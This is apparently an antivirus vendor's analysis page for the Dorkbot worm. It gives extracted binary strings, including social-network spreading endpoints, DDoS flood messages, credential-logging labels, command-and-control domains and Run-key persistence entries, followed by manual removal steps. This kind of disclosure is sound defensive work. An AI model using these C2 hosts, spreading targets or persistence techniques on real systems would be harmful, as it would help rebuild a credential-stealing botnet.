Software\Microsoft\Windows\CurrentVersion\Run

\\.\%c:

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

m1xg.org

mxxtxxt.biz

meob.me

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

SSRR %s 0 0 :%s

KCIK %s

SEND %s %s

PART %s

PPPPMSG %s :%s

QUIT :%s

PPNG %s

PPPPMSG

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\c1419a97

%Program Files%\Java\jre6\bin\jqs.exe

%WinDir%

%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe

7 767<7~7

8*808;8~8

%s\Identities\%s.exe

\\.\pipe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\

winlogon.exe

notepad.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\Program Files\Java\jre6\bin\jqs.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\fdsfifew.exe

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Scan a system with an anti-rootkit tool.
Terminate malicious process(es) (How to End a Process With the Task Manager):

dfwef.exe:808
dfwef.exe:1180
fsdgs.exe:616
fsdgs.exe:1100
%original file name%.exe:856
fdsfifew.exe:1648
fdsfifew.exe:1952
f3ed.exe:2100
f3ed.exe:2232
Delete the original Worm file.
Delete or disinfect the following files created/modified by the Worm:

%Documents and Settings%\%current user%\My Documents\My Videos\Desktop.ini (312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\c731200 (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6J2ZSR8X\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QMJ67ZRX\bet[1].exe (83247 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QMJ67ZRX\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4LUJ4TIB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IIGAYS9V\spm[1].exe (45921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\f3ed.exe (19495 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6J2ZSR8X\dqnew[1].exe (21051 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\fdsfifew.exe (46039 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IIGAYS9V\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4LUJ4TIB\ng[1].exe (51385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\fsdgs.exe (42792 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dfwef.exe (77496 bytes)
%Documents and Settings%\%current user%\Application Data\c731200 (673 bytes)
C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-16678766\a5456663.exe (601 bytes)
C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-16678766\Desktop.ini (63 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicrosoftPerfWD" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\fsdgs.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Uukmkg" = "%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"a754353" = "C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-16678766\a5456663.exe"
Remove the references to the Worm by modifying the following registry value(s) (How to Work with System Registry):

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-16678766\a5456663.exe"
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Worm.Win32.Dorkbot_2c9bc71e06

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Worm.Win32.Dorkbot_2c9bc71e06

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet